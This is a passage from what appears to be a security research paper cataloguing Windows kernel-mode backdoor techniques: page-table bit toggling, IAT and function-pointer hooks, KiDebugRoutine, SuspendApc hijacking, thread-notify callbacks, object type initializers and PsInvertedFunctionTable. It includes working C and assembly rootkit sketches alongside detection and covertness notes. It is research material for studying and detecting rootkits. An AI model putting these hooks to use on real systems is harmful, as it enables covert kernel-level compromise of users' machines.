linear address, it walks a number of page tables to determine the associated
physical address. When this occurs, the processor makes a check to ensure
that the task referencing the address has sufficient rights to do so. This
access check is enforced by checking the User/Supervisor bit of the
Page-Directory Entry (PDE) and Page-Table Entry (PTE) associated with the
page. If this bit is clear, only the supervisor (privilege level 0) is
allowed to access the page. If the bit is set, both supervisor and user are
allowed to access the page (this isn't always the case, depending on whether
or not the WP bit is set in CR0).

The implications surrounding this flag should be obvious. By toggling the
flag in the PDE and PTE associated with an address, a backdoor can gain access
to read or write kernel-mode memory. This would indirectly make it possible
to gain code execution by making use of one of the other techniques listed in
this document.
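
As a rough illustration, the following sketch toggles the User/Supervisor bit
for a single page on a non-PAE x86 system, where the page tables are
self-mapped at well-known virtual addresses. This is only a sketch under those
assumptions; as noted in the considerations below, a real implementation would
also need to handle PAE systems, large pages, and page residency:

#include <ntddk.h>
#include <intrin.h>

// Non-PAE x86 only: PTEs are self-mapped at 0xC0000000 and PDEs at
// 0xC0300000. The page is assumed to be resident (e.g. locked via an MDL).
#define PDE_BASE  0xC0300000
#define PTE_BASE  0xC0000000
#define PAGE_USER 0x4           // User/Supervisor bit

VOID MakePageUserAccessible(PVOID VirtualAddress)
{
    ULONG_PTR Va  = (ULONG_PTR)VirtualAddress;
    PULONG    Pde = (PULONG)(PDE_BASE + ((Va >> 22) * sizeof(ULONG)));
    PULONG    Pte = (PULONG)(PTE_BASE + ((Va >> 12) * sizeof(ULONG)));

    // Both the directory and table entries must allow user access.
    *Pde |= PAGE_USER;
    *Pte |= PAGE_USER;

    // Flush the TLB entry for the page so the change takes effect.
    __invlpg(VirtualAddress);
}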

Category: Type II

Origin: The modification of PDE and PTE entries has been supported since
hardware paging's inception. The authors were not able to find an exact
source of the first use of this technique in a backdoor. There have been a
number of examples in recent years of tools that abuse the supervisor bit in
one way or another[29, 41]. The PaX team provided the first documentation of
their PAGEEXEC code in March, 2003. In January, 1998, Mythrandir mentions the
supervisor bit in Phrack 52 but doesn't explicitly call out how it could be
abused[28].

Capabilities: Access to kernel-mode data.

Considerations: Code that attempts to implement this approach would need to
properly support PAE and non-PAE processors on x86 in order to work reliably.
This approach is also extremely dangerous and potentially unreliable depending
on how it interacts with the memory manager. For example, if pages are not
properly locked into physical memory, they may be pruned and thus any PDE or
PTE modifications would be lost. This would result in the user-mode process
losing access to a specific page.

Covertness: This approach could be considered fairly covert without the
presence of some tool capable of intercepting PDE or PTE modifications.
Locking pages into physical memory may make it easier to detect in a polling
fashion by walking the set of locked pages and checking to see if their
associated PDE or PTE has been made accessible to user-mode.

2.5) Function Pointers

Function pointers are used extensively by the Windows kernel to indirectly
transfer control of execution from one location to another[18]. Like the
function prologue overwrite described earlier in this paper, the act of
hooking a function by altering a function pointer is an easy way to intercept
future calls to a given function. The difference, however, is that hooking a
function by altering a function pointer will only intercept indirect calls
made to the hooked function through the function pointer. Though this may seem
like a fairly significant limitation, even these restrictions do not
drastically limit the set of function pointers that can be abused to provide a
kernel-mode backdoor.

The concept itself should be simple enough. All that's necessary is to modify
the contents of a given function pointer to point at untrusted code. When the
function is invoked through the function pointer, the untrusted code is
executed instead. If the untrusted code wishes to be able to call the
function that is being hooked, it can save the address that is stored in the
function pointer prior to overwriting it. When possible, hooking a function
through a function pointer is a simple and elegant solution that should have
very little impact on the stability of the system (with the obvious exception
of the quality of the replacement function).

Regardless of what approach is taken to hook a function, an obvious question
is where the backdoor code associated with a given hook function should be
placed. There are really only two general memory locations in which the code
can be stored. It can either be stored in user-mode, which would generally
make it specific to a given process, or kernel-mode, which would make it
visible system wide. Deciding which of the two locations to use is a matter of
determining the contextual restrictions of the function pointer being
leveraged. For example, if the function pointer is called through at a raised
IRQL, such as DISPATCH_LEVEL, then it is not possible to store the hook
function's code in pageable memory. Another example of a restriction is the
process context in which the function pointer is used. If a function pointer
may be called through in any process context, then there are only a finite
number of locations in which the code could be placed in user-mode. It's
important to understand some of the specific locations in which code may be
stored.

Perhaps the most obvious location that can be used to store code that is to
execute in kernel-mode is the kernel pools, such as the PagedPool and
NonPagedPool, which are used to store dynamically allocated memory. In some
circumstances, it may also be possible to store code in regions of memory that
contain code or data associated with device drivers. While these few examples
illustrate that there is certainly no shortage of locations in which to store
code, there are a few locations in particular that are worth calling out.

One such location is composed of a single physical page that is shared between
user-mode and kernel-mode.
This physical page is known as SharedUserData and
it is mapped into user-mode as read-only and kernel-mode as read-write. The
virtual address that this physical page is mapped at is static in both
user-mode (0x7ffe0000) and kernel-mode (0xffdf0000) on all versions of Windows
NT+ (the virtual mappings are no longer executable as of Windows XP SP2;
however, it is entirely possible for a backdoor to alter these page
permissions). There is also plenty of unused memory within the page that is
allocated for SharedUserData. The fact that the mapping address is static
makes it a useful location to store small amounts of code without needing to
allocate additional storage from the paged or non-paged pool[24].

Though the SharedUserData mapping is quite useful, there is actually an
alternative location that can be used to store code that is arguably more
covert. This approach involves overwriting a function pointer with the
address of some code from the virtual mapping of the native DLL, ntdll.dll.
The native DLL is special in that it is the only DLL that is guaranteed to be
mapped into the context of every process, including the System process. It is
also mapped at the same base address in every process due to assumptions made
by the Windows kernel. While these are useful qualities, the best reason for
using the ntdll.dll mapping to store code is that doing so makes it possible
to store code in a process-relative fashion. Understanding how this works in
practice requires some additional explanation.

The native DLL, ntdll.dll, is mapped into the address space of the System
process and subsequent processes during kernel and process initialization,
respectively. This mapping is performed in kernel-mode by nt!PspMapSystemDll.
One can observe the presence of this mapping in the context of the System
process through a debugger as shown below. These same basic steps can be
taken to confirm that ntdll.dll is mapped into other processes as well (the
command !vad is used to dump the virtual address directory for a given
process; this directory contains descriptions of memory regions within a
given process):

kd> !process 0 0 System
PROCESS 81291660 SessionId: none Cid: 0004
    Peb: 00000000 ParentCid: 0000
    DirBase: 00039000 ObjectTable: e1000a68
    HandleCount: 256.
    Image: System
kd> !process 81291660
PROCESS 81291660 SessionId: none Cid: 0004
    Peb: 00000000 ParentCid: 0000
    DirBase: 00039000 ObjectTable: e1000a68
    HandleCount: 256.
    Image: System
    VadRoot 8128f288 Vads 4
...
kd> !vad 8128f288
VAD level start end commit
...
81207d98 ( 1) 7c900 7c9af 5 Mapped Exe
kd> dS poi(poi(81207d98+0x18)+0x24)+0x30
e13591a8 "\WINDOWS\system32\ntdll.dll"

To make use of the ntdll.dll mapping as a location in which to store code, one
must understand the implications of altering the contents of the mapping
itself. Like all other image mappings, the code pages associated with
ntdll.dll are marked as Copy-on-Write (COW) and are initially shared between
all processes. When data is written to a page that has been marked with COW,
the kernel allocates a new physical page and copies the contents of the shared
page into the newly allocated page. This new physical page is then associated
with the virtual page that is being written to. Any changes made to the new
page are observed only within the context of the process that is making them.
This behavior is why altering the contents of a mapping associated with an
image file does not lead to changes appearing in all process contexts.

Based on the ability to make process-relative changes to the ntdll.dll
mapping, one is able to store code that will only be used when a function
pointer is called through in the context of a specific process. When not
called in a specific process context, whatever code exists in the default
mapping of ntdll.dll will be executed. In order to better understand how this
may work, it makes sense to walk through a concrete example.

In this example, a rootkit has opted to create a backdoor by overwriting the
function pointer that is used when dispatching IRPs using the
IRP_MJ_FLUSH_BUFFERS major function for a specific device object. The
prototype for the function that handles IRP_MJ_FLUSH_BUFFERS IRPs is shown
below:

NTSTATUS DispatchFlushBuffers(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp);

In order to create a context-specific backdoor, the rootkit has chosen to
overwrite the function pointer described above with an address that resides
within ntdll.dll. By default, the rootkit wants all processes except those
that are aware of the backdoor to simply have a no-operation occur when
IRP_MJ_FLUSH_BUFFERS is sent to the device object. For processes that are aware
of the backdoor, the rootkit wants arbitrary code execution to occur in
kernel-mode. To accomplish this, the function pointer should be overwritten
with an address that resides in ntdll.dll that contains a ret 0x8 instruction.
This will simply cause invocations of IRP_MJ_FLUSH_BUFFERS to return (without
completing the IRP). The location of this ret 0x8 should be in a portion of
code that is rarely executed in user-mode. For processes that wish to execute
arbitrary code in kernel-mode, it's as simple as altering the code that exists
at the address of the ret 0x8 instruction. After altering the code, the
process only needs to issue an IRP_MJ_FLUSH_BUFFERS through the FlushFileBuffers
function on the affected device object. The context-dependent execution of
code is made possible by the fact that, in most cases, IRPs are processed in
the context of the requesting process.
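
To make the example concrete, the user-mode side of this scenario might look
roughly like the following sketch. The target address of the hypothetical ret
0x8, the payload bytes, and the device handle are all placeholders; because
the ntdll.dll pages are copy-on-write, the patch is visible only in the
process that applies it:

#include <windows.h>
#include <string.h>

// Hypothetical trigger: patch the code at the hooked ret 0x8 location
// inside this process' ntdll.dll mapping and then cause the hooked
// IRP_MJ_FLUSH_BUFFERS dispatch routine to run it in kernel-mode.
BOOL PatchAndTrigger(HANDLE Device, PVOID TargetAddress,
                     const unsigned char *Payload, SIZE_T PayloadSize)
{
    DWORD OldProtect;

    if (!VirtualProtect(TargetAddress, PayloadSize,
                        PAGE_EXECUTE_READWRITE, &OldProtect))
        return FALSE;

    memcpy(TargetAddress, Payload, PayloadSize);

    VirtualProtect(TargetAddress, PayloadSize, OldProtect, &OldProtect);
    FlushInstructionCache(GetCurrentProcess(), TargetAddress, PayloadSize);

    // The IRP is dispatched in the context of this process, so the
    // patched bytes are what the kernel ends up executing.
    return FlushFileBuffers(Device);
}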

The remainder of this subsection will describe specific function pointers
that may be useful targets for use as backdoors. The authors have tried to
cover some of the more intriguing examples of function pointers that may be
hooked. Still, it goes without saying that there are many more that have not
been explicitly described. The authors would be interested to hear about
additional function pointers that have unique and useful properties in the
context of a local kernel-mode backdoor.

2.5.1) Import Address Table

The Import Address Table (IAT) of a PE image is used to store the absolute
virtual addresses of functions that are imported from external PE
images[35]. When a PE image is mapped into virtual memory, the dynamic loader (in
kernel-mode, this is ntoskrnl) takes care of populating the contents of the PE
image's IAT based on the actual virtual address locations of dependent
functions (for the sake of simplicity, bound imports are excluded from this
explanation). The compiler, in turn, generates code that uses an indirect call
instruction to invoke imported functions. Each imported function has a
function pointer slot in the IAT. In this fashion, PE images do not need to
have any preconceived knowledge of where dependent PE images are going to be
mapped in virtual memory. Instead, this knowledge can be postponed until a
runtime determination is made.

The fundamental step involved in hooking an IAT entry really just boils down
to changing a function pointer. What distinguishes an IAT hook from other
types of function pointer hooks is the context in which the overwritten
function pointer is called through. Since each PE image has its own IAT,
any hook that is made to a given IAT will implicitly only affect the
associated PE image. For example, consider a situation where both foo.sys and
bar.sys import ExAllocatePoolWithTag. If the IAT entry for
ExAllocatePoolWithTag is hooked in foo.sys, only those calls made from within
foo.sys to ExAllocatePoolWithTag will be affected. Calls made to the same
function from within bar.sys will be unaffected. This type of limitation can
actually be a good thing, depending on the underlying motivations for a given
backdoor.

Category: Type I; may legitimately be modified, but should point to expected
values.

Origin: The origin of the first IAT hook is unclear. In January, 2000, Silvio
described hooking via the ELF PLT, which is, in some aspects, functionally
equivalent to the IAT in PE images.

Capabilities: Kernel-mode code execution.

Considerations: Assuming the calling restrictions of an IAT hook are
acceptable for a given backdoor, there are no additional considerations that
need to be made.

Covertness: It is possible for modern tools to detect IAT hooks by analyzing
the contents of the IAT of each PE image loaded in kernel-mode. To detect
discrepancies, a tool need only check to see if the virtual address associated
with each function in the IAT is indeed the same virtual address as exported
by the PE image that contains a dependent function.
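
As a simple illustration of the hooking step itself, the following sketch
walks a loaded PE image's import descriptors and swaps the IAT entry whose
current value matches a given routine (for example, an address previously
obtained with MmGetSystemRoutineAddress). The PE structure definitions come
from ntimage.h in the WDK, and any write-protection on the IAT page is
ignored in this sketch:

#include <ntddk.h>
#include <ntimage.h>

// Returns the original pointer on success, or NULL if no matching IAT
// entry was found in the image mapped at ImageBase.
PVOID HookIatEntry(PVOID ImageBase, PVOID OriginalRoutine, PVOID HookRoutine)
{
    PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)ImageBase;
    PIMAGE_NT_HEADERS NtHeaders =
        (PIMAGE_NT_HEADERS)((PUCHAR)ImageBase + DosHeader->e_lfanew);
    IMAGE_DATA_DIRECTORY ImportDir =
        NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    PIMAGE_IMPORT_DESCRIPTOR ImportDesc;

    if (ImportDir.VirtualAddress == 0)
        return NULL;

    ImportDesc = (PIMAGE_IMPORT_DESCRIPTOR)
        ((PUCHAR)ImageBase + ImportDir.VirtualAddress);

    // Walk each imported module's IAT until the target entry is found.
    for (; ImportDesc->Name != 0; ImportDesc++)
    {
        PVOID *IatEntry = (PVOID *)
            ((PUCHAR)ImageBase + ImportDesc->FirstThunk);

        for (; *IatEntry != NULL; IatEntry++)
        {
            if (*IatEntry == OriginalRoutine)
                return InterlockedExchangePointer(IatEntry, HookRoutine);
        }
    }

    return NULL;
}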

2.5.2) KiDebugRoutine

The Windows kernel provides an extensive debugging interface to allow the
kernel itself (and third party drivers) to be debugged in a live, interactive
environment (as opposed to after-the-fact, post-mortem crash dump debugging).
This debugging interface is used by a kernel debugger program (kd.exe, or
WinDbg.exe) in order to perform tasks such as inspecting the running state
(including memory, registers, kernel state such as processes and threads, and
the like) of the kernel on-demand. The debugging interface also provides
facilities for the kernel to report various events of interest to a kernel
debugger, such as exceptions, module load events, debug print output, and a
handful of other state transitions. As a result, the kernel debugger
interface has ``hooks'' built-in to various parts of the kernel for the
purpose of notifying the kernel debugger of these events.

The far-reaching capabilities of the kernel debugger in combination with the
fact that the kernel debugger interface is (in general) present in a
compatible fashion across all OS builds provides an attractive mechanism that
can be used to gain control of a system. By subverting KiDebugRoutine to
instead point to a custom callback function, it becomes possible to
surreptitiously gain control at key moments (debug prints, exception
dispatching, and kernel module loading are the primary candidates).

The architecture of the kernel debugger event notification interface can be
summed up in terms of a global function pointer (KiDebugRoutine) in the
kernel. A number of distinct pieces of code, such as the exception dispatcher,
module loader, and so on, are designed to call through KiDebugRoutine in order
to notify the kernel debugger of events. In order to minimize overhead in
scenarios where the kernel debugger is inactive, KiDebugRoutine is typically
set to point to a dummy function, KdpStub, which performs almost no actions
and, for the most part, simply returns immediately to the caller. However,
when the system is booted with the kernel debugger enabled, KiDebugRoutine may
be set to an alternate function, KdpTrap, which passes the information
supplied by the caller to the remote debugger.

Although enabling or disabling the kernel debugger has traditionally been a
boot-time-only decision, newer OS builds such as Windows Server 2003 and
beyond have some support for transitioning a system from a ``kernel debugger
inactive'' state to a ``kernel debugger active'' state. As a result, there is
some additional logic now baked into the dummy routine (KdpStub) which can
under some circumstances result in the debugger being activated on-demand.
This results in control being passed to the actual debugger communication
routine (KdpTrap) after an on-demand kernel debugger initialization. Thus, in
some circumstances, KdpStub will pass control through to KdpTrap.

Additionally, in Windows Server 2003 and later, it is possible to disable the
kernel debugger on the fly. This may result in KiDebugRoutine being changed
to refer to KdpStub instead of the boot-time-assigned KdpTrap. This behavior,
combined with the previous points, is meant to show that, provided a system is
booted with the kernel debugger enabled, it may not be enough to just enforce
a policy that KiDebugRoutine must not change throughout the lifetime of the
system.

Aside from exception dispatching notifications, most debug events find their
way to KiDebugRoutine via interrupt 0x2d, otherwise known as ``DebugService''.
This includes user-mode debug print events as well as kernel-mode originated
events (such as kernel module load events). The trap handler for interrupt
0x2d packages the information supplied to the debug service interrupt into the
format of a special exception that is then dispatched via KiExceptionDispatch
(the normal exception dispatcher path for interrupt-generated exceptions).
This in turn leads to KiDebugRoutine being called as a normal part of the
exception dispatcher's operation.

Category: Type IIa, varies. Although on previous OS versions KiDebugRoutine
was essentially write-once, recent versions allow limited changes of this
value on the fly while the system is booted.

Origin: At the time of this writing, the authors are not aware of existing
malware using KiDebugRoutine.

Capabilities: Redirecting KiDebugRoutine to point to a caller-controlled
location allows control to be gained during exception dispatching (a very
common occurrence), as well as certain other circumstances (such as module
loading and debug print output). As an added bonus, because KiDebugRoutine is
integral to the operation of the kernel debugger facility as a whole, it
should be possible to ``filter'' the events received by the kernel debugger by
manipulation of which events are actually passed on to KdpTrap, if a kernel
debugger is enabled. However, it should be noted that other steps would need
to be taken to prevent a kernel debugger from detecting the presence of code,
such as the interception of the kernel debugger read-memory facilities.
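
Once the non-exported KiDebugRoutine has been located by some other means
(for example, by scanning code that references it), installing the hook
itself can be as simple as a single interlocked pointer exchange, as the
considerations below note. A minimal sketch, assuming the address and a
suitable replacement routine are supplied by the caller:

#include <ntddk.h>

// Swaps KiDebugRoutine for a caller-controlled routine and returns the
// previous value (KdpStub or KdpTrap) so that it can be chained to.
PVOID HookKiDebugRoutine(
    PVOID *KiDebugRoutineAddress,   // located elsewhere; assumed valid
    PVOID HookRoutine)
{
    return InterlockedExchangePointer(KiDebugRoutineAddress, HookRoutine);
}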
+ +Considerations: Depending on how the system global flags (NtGlobalFlag) are +configured, and whether the system was booted in such a way as to suppress +notification of user mode exceptions to the kernel debugger, exception events +may not always be delivered to KiDebugRoutine. Also, as KiDebugRoutine is not +exported, it would be necessary to locate it in order to intercept it. +Furthermore, many of the debugger events occur in an arbitrary context, such +that pointing KiDebugRoutine to user mode (except within ntdll space) may be +considered dangerous. Even while pointing KiDebugRoutine to ntdll, there is +the risk that the system may be brought down as some debugger events may be +reported while the system cannot tolerate paging (e.g. debug prints). From a +thread-safety perspective, an interlocked exchange on KiDebugRoutine should be +a relatively synchronization-safe operation (however the new callback routine +may never be unmapped from the address space without some means of ensuring +that no callbacks are active). + +Covertness: As KiDebugRoutine is a non-exported, writable kernel global, it +has some inherent defenses against simple detection techniques. However, in +legitimate system operation, there are only two legal values for +KiDebugRoutine: KdpStub, and KdpTrap. Though both of these routines are not +exported, a combination of detection techniques (such as verifying the +integrity of read only kernel code, and a verification that KiDebugRoutine +refers to a location within an expected code region of the kernel memory +image) may make it easier to locate blatant attacks on KiDebugRoutine. For +example, simply setting KiDebugRoutine to point to an out-of-kernel location +could be detected with such an approach, as could pointing it elsewhere in the +kernel and then writing to it (either the target location would need to be +outside the normal code region, easily detectable, or normally read-only code +would have to be overwritten, also relatively easily detectable). Also, all +versions of PatchGuard protect KiDebugRoutine in x64 versions of Windows. +This means that effective exploitation of KiDebugRoutine in the long term on +such systems would require an attacker to deal with PatchGuard. This is +considered a relatively minor difficulty by the authors. + +2.5.3) KTHREAD's SuspendApc + +In order to support thread suspension, the Windows kernel includes a KAPC +field named SuspendApc in the KTHREAD structure that is associated with each +thread running on a system. When thread suspension is requested, the kernel +takes steps to queue the SuspendApc structure to the thread's APC queue. When +the APC queue is processed, the kernel invokes the APC's NormalRoutine, which +is typically initialized to nt!KiSuspendThread, from the SuspendApc structure +in the context of the thread that is being suspended. Once nt!KiSuspendThread +completes, the thread is suspended. The following shows what values the +SuspendApc is typically initialized to: + +kd> dt -r1 _KTHREAD 80558c20 +... 
+ +0x16c SuspendApc : _KAPC + +0x000 Type : 18 + +0x002 Size : 48 + +0x004 Spare0 : 0 + +0x008 Thread : 0x80558c20 _KTHREAD + +0x00c ApcListEntry : _LIST_ENTRY [ 0x0 - 0x0 ] + +0x014 KernelRoutine : 0x804fa8a1 nt!KiSuspendNop + +0x018 RundownRoutine : 0x805139ed nt!PopAttribNop + +0x01c NormalRoutine : 0x804fa881 nt!KiSuspendThread + +0x020 NormalContext : (null) + +0x024 SystemArgument1: (null) + +0x028 SystemArgument2: (null) + +0x02c ApcStateIndex : 0 '' + +0x02d ApcMode : 0 '' + +0x02e Inserted : 0 '' + +Since the SuspendApc structure is specific to a given KTHREAD, any +modification made to a thread's SuspendApc.NormalRoutine will affect only that +specific thread. By modifying the NormalRoutine of the SuspendApc associated +with a given thread, a backdoor can gain arbitrary code execution in +kernel-mode by simply attempting to suspend the thread. It is trivial for a +user-mode application to trigger the backdoor. The following sample code +illustrates how a thread might execute arbitrary code in kernel-mode if its +SuspendApc has been modified: + +SuspendThread(GetCurrentThread()); + +The following code gives an example of assembly that implements the technique +described above taking into account the InitialStack insight described in the +considerations below: + +public _RkSetSuspendApcNormalRoutine@4 +_RkSetSuspendApcNormalRoutine@4 proc + assume fs:nothing + push edi + push esi + ; Grab the current thread pointer + xor ecx, ecx + inc ch + mov esi, fs:[ecx+24h] + ; Grab KTHREAD.InitialStack + lea esi, [esi+18h] + lodsd + xchg esi, edi + ; Find StackBase + repne scasd + ; Set KTHREAD->SuspendApc.NormalRoutine + mov eax, [esp+0ch] + xchg eax, [edi+1ch] + pop esi + pop edi + ret +_RkSetSuspendApcNormalRoutine@4 endp + + +Category: Type IIa + +Origin: The authors believe this to be the first public description of this +technique. Skywing is credited with the idea. Greg Hoglund mentions abusing +APC queues to execute code, but he does not explicitly call out +SuspendApc[18]. + +Capabilities: Kernel-mode code execution. + +Considerations: This technique is extremely effective. It provides a simple +way of executing arbitrary code in kernel-mode by simply hijacking the +mechanism used to suspend a specific thread. There are also some interesting +side effects that are worth mentioning. Overwriting the SuspendApc's +NormalRoutine makes it so that the thread can no longer be suspended. Even +better, if the hook function that replaces the NormalRoutine never returns, it +becomes impossible for the thread, and thus the owning process, to be killed +because of the fact that the NormalRoutine is invoked at APC level. Both of +these side effects are valuable in the context of a rootkit. + +One consideration that must be made from the perspective of a backdoor is that +it will be necessary to devise a technique that can be used to locate the +SuspendApc field in the KTHREAD structure across multiple versions of Windows. +Fortunately, there are heuristics that can be used to accomplish this. In all +versions of Windows analyzed thus far, the SuspendApc field is preceded by the +StackBase field. It has been confirmed on multiple operating systems that the +StackBase field is equal to the InitialStack field. The InitialStack field is +located at a reliable offset (0x18) on all versions of Windows checked by the +authors. Using this knowledge, it is trivial to write some code that scans +the KTHREAD structure on pointer aligned offsets until it encounters a value +that is equal to the InitialStack. 
Once a match is found, it is possible to
assume that the SuspendApc immediately follows it.

Covertness: This technique involves overwriting a function pointer in a
dynamically allocated region of memory that is associated with a specific
thread. This makes the technique fairly covert, but not impossible to detect.
One method of detecting this technique would be to enumerate the threads in
each process to see if the NormalRoutine of the SuspendApc is set to the
expected value of nt!KiSuspendThread. It would be challenging for someone
other than Microsoft to implement this safely. The authors are not aware of
any tool that currently does this.

2.5.4) Create Thread Notify Routine

The Windows kernel provides drivers with the ability to register a callback
that will be notified when threads are created and terminated. This ability
is provided through the Windows Driver Model (WDM) export
nt!PsSetCreateThreadNotifyRoutine. When a thread is created or terminated,
the kernel enumerates the list of registered callbacks and notifies them of
the event.

Category: Type II

Origin: The ability to register a callback that is notified when threads are
created and terminated has been included since the first release of the WDM.

Capabilities: Kernel-mode code execution.

Considerations: This technique is useful because a user-mode process can
control the invocation of the callback by simply creating or terminating a
thread. Additionally, the callback will be notified in the context of the
process that is creating or terminating the thread. This makes it possible to
set the callback routine to an address that resides within ntdll.dll.

Covertness: This technique is covert in that it is possible for a backdoor to
blend in with any other registered callbacks. Without having a known-good
state to compare against, it would be challenging to conclusively state that a
registered callback is associated with a backdoor. There are some indicators
that could be used to suggest that something is odd, such as if the callback
routine resides in ntdll.dll or if it resides in either the paged or non-paged
pool.
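
A minimal sketch of how a driver might register such a callback is shown
below; the callback body is a placeholder for whatever backdoor logic (or
call into a patched ntdll.dll mapping) is desired:

#include <ntddk.h>

// Invoked in the context of the process creating or terminating the thread.
VOID BackdoorThreadNotify(
    HANDLE ProcessId,
    HANDLE ThreadId,
    BOOLEAN Create)
{
    UNREFERENCED_PARAMETER(ProcessId);
    UNREFERENCED_PARAMETER(ThreadId);
    UNREFERENCED_PARAMETER(Create);

    // backdoor logic would run here
}

NTSTATUS RegisterBackdoorThreadNotify(VOID)
{
    return PsSetCreateThreadNotifyRoutine(BackdoorThreadNotify);
}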

2.5.5) Object Type Initializers

The Windows NT kernel uses an object-oriented approach to representing
resources such as files, drivers, devices, processes, threads, and so on.
Each object is categorized by an object type. This object type categorization
provides a way for the kernel to support common actions that should be applied
to objects of the same type, among other things. Under this design, each
object is associated with only one object type. For example, process objects
are associated with the nt!PsProcessType object type. The structure used to
represent an object type is the OBJECT_TYPE structure, which contains a nested
structure named OBJECT_TYPE_INITIALIZER. It's this second structure that
provides some particularly interesting fields that can be used in a backdoor.

As one might expect, the fields of most interest are function pointers. These
function pointers, if non-null, are called by the kernel at certain points
during the lifetime of an object that is associated with a particular object
type. The following debugger output shows the function pointer fields:

kd> dt nt!_OBJECT_TYPE_INITIALIZER
...
 +0x02c DumpProcedure : Ptr32
 +0x030 OpenProcedure : Ptr32
 +0x034 CloseProcedure : Ptr32
 +0x038 DeleteProcedure : Ptr32
 +0x03c ParseProcedure : Ptr32
 +0x040 SecurityProcedure : Ptr32
 +0x044 QueryNameProcedure : Ptr32
 +0x048 OkayToCloseProcedure : Ptr32

Two fairly easy to understand procedures are OpenProcedure and CloseProcedure.
These function pointers are called when an object of a given type is opened
and closed, respectively. This gives the object type initializer a chance to
perform some common operation on an instance of an object type. In the case
of a backdoor, this exposes a mechanism through which arbitrary code could be
executed in kernel-mode whenever an object of a given type is opened or
closed.

Category: Type IIa

Origin: Matt Conover gave an excellent presentation on how object type
initializers can be used to detect rootkits at XCon 2005[8]. Conversely, they
can also be used to backdoor the system. The authors are not aware of public
examples prior to Conover's presentation. Greg Hoglund also mentions this
type of approach[18] in June, 2006.

Capabilities: Kernel-mode code execution.

Considerations: There are no unique considerations involved in the use of this
technique.

Covertness: This technique can be detected by tools designed to validate the
state of object type initializers against a known-good state. Currently, the
authors are not aware of any tools that perform this type of check.

2.5.6) PsInvertedFunctionTable

With the introduction of Windows for x64, significant changes were made to how
exceptions are processed relative to x86 versions of Windows. On x86 versions
of Windows, exception handlers were essentially demand-registered at runtime
by routines with exception handlers (more of a code-based exception
registration mechanism). On x64 versions of Windows, the exception
registration path is accomplished using a more data-driven model.
Specifically, exception handling (and especially unwind handling) is now
driven by metadata attached to each PE image (known as the ``exception
directory''), which describes the relationship between routines and their
exception handlers, what the exception handler function pointer(s) for each
region of a routine are, and how to unwind each routine's machine state in a
completely data-driven fashion.

While there are significant advantages to having exception and unwind
dispatching accomplished using a data-driven model, there is a potential
performance penalty over the x86 method (which consisted of a linked list of
exception and unwind handlers registered at a known location, on a per-thread
basis). A specific example of this can be seen by noting that all of the
information needed for the operating system to locate and call the exception
handler for purposes of exception or unwind processing, which was in one
location (the linked list in the NTTIB) on Windows for x86, is now scattered
across all loaded modules in Windows for x64. In order to locate an exception
handler for a particular routine, it is necessary to search the loaded module
list for the module that contains the instruction pointer corresponding to the
function in question. After the module is located, it is then necessary to
process the PE header of the module to locate the module's exception
directory.
Finally, it is then necessary to search the exception directory +of that module for the metadata corresponding to a location encompassing +the requested instruction pointer. This process must be repeated for every +function for which an exception may traverse. + +In an effort to improve the performance of exception dispatching on Windows +for x64, Microsoft developed a multi-tier cache system that speeds the +resolution of exception dispatching information that is used by the routine +responsible for looking up metadata associated with a function. The +routine responsible for this is named RtlLookupFunctionTable. When +searching for unwind information (a pointer to a RUNTIME_FUNCTION entry +structure), depending on the reason for the search request, an internal +first-level cache (RtlpUnwindHistoryTable) of unwind information for +commonly occurring functions may be searched. At the time of this writing, +this table consists of RtlUnwindex, _C_specific_handler, +RtlpExecuteHandlerForException, RtlDispatchException, RtlRaiseStatus, +KiDispatchException, and KiExceptionDispatch. Due to how exception +dispatching operates on x64[39], many of these functions will commonly appear +in any exception call stack. Because of this it is beneficial to +performance to have a first-level, quick reference for them. + +After RtlpUnwindHistoryTable is searched, a second cache, known as +PsInvertedFunctionTable (in kernel-mode) or LdrpInvertedFunctionTable (in +user-mode) is scanned. This second-level cache contains a list of the first +0x200 (Windows Server 2008, Windows Vista) or 0xA0 (Windows Server 2003) +loaded modules. The loaded module list contained within +PsInvertedFunctionTable / LdrpInvertedFunctionTable is presented as a quickly +searchable, unsorted linear array that maps the memory occupied by an entire +loaded image to a given module's exception directory. The lookup through the +inverted function table thus eliminates the costly linked list (loaded module +list) and executable header parsing steps necessary to locate the exception +directory for a module. For modules which are referenced by +PsInvertedFunctionTable / LdrpInvertedFunctionTable, the exception directory +pointer and size information in the PE header of the module in question are +unused after the module is loaded and the inverted function table is +populated. Because the inverted function table has a fixed size, if enough +modules are loaded simultaneously, it is possible that after a point some +modules may need to be scanned via loaded module list lookup if all entries in +the inverted function table are in use when that module is loaded. However, +this is a rare occurrence, and most of the interesting system modules (such as +HAL and the kernel memory image itself) are at a fixed-at-boot position within +PsInvertedFunctionTable[37]. + +By redirecting the exception directory pointer in PsInvertedFunctionTable to +refer to a ``shadow'' exception directory in caller-supplied memory (outside +of the PE header of the actual module), it is possible to change the exception +(or unwind) handling behavior of all code points within a module. For +instance, it is possible to create an exception handler spanning every code +byte within a module through manipulation of the exception directory +information. By changing the inverted function table cache for a module, +multiple benefits are realized with respect to this goal. 
First, an
arbitrarily large amount of space may be devoted to unwind metadata, as the
patched unwind metadata need not fit within the confines of a particular
image's exception directory (this is particularly important if one wishes to
``gift'' all functions within a module with an exception handler). Second,
the memory image of the module in question need not be modified, improving the
resiliency of the technique against naive detection systems.

Category: Type IIa, varies. Although the entries for always-loaded modules
such as the HAL and the kernel in-memory image itself are essentially
considered write-once, the array as a whole may be modified as the system is
running when kernel modules are either loaded or unloaded. As a result, while
the first few entries of PsInvertedFunctionTable are comparatively easy to
verify, the ``dynamic'' entries corresponding to demand-loaded (and possibly
demand-unloaded) kernel modules may frequently change during the legitimate
operation of the system, and as such interception of the exception directory
pointers of individual drivers may be much less simple to detect than the
interception of the kernel's exception directory.

Origin: At the time of this writing, the authors are not aware of existing
malware using PsInvertedFunctionTable. Hijacking of PsInvertedFunctionTable
was proposed as a possible bypass avenue for PatchGuard version 2 by
Skywing[37]. Its applicability as a possible attack vector with respect to
hiding kernel mode code was also briefly described in the same article.

Capabilities: The principal capability afforded by this technique is to
establish an exception handler at arbitrary locations within a target module
(even every code byte within a module if so desired). By virtue of creating
such exception handlers, it is possible to gain control at any location within
a module that may be traversed by an exception, even if the exception would
normally be handled in a safe fashion by the module or a caller of the module.

Considerations: As PsInvertedFunctionTable is not exported, one must first
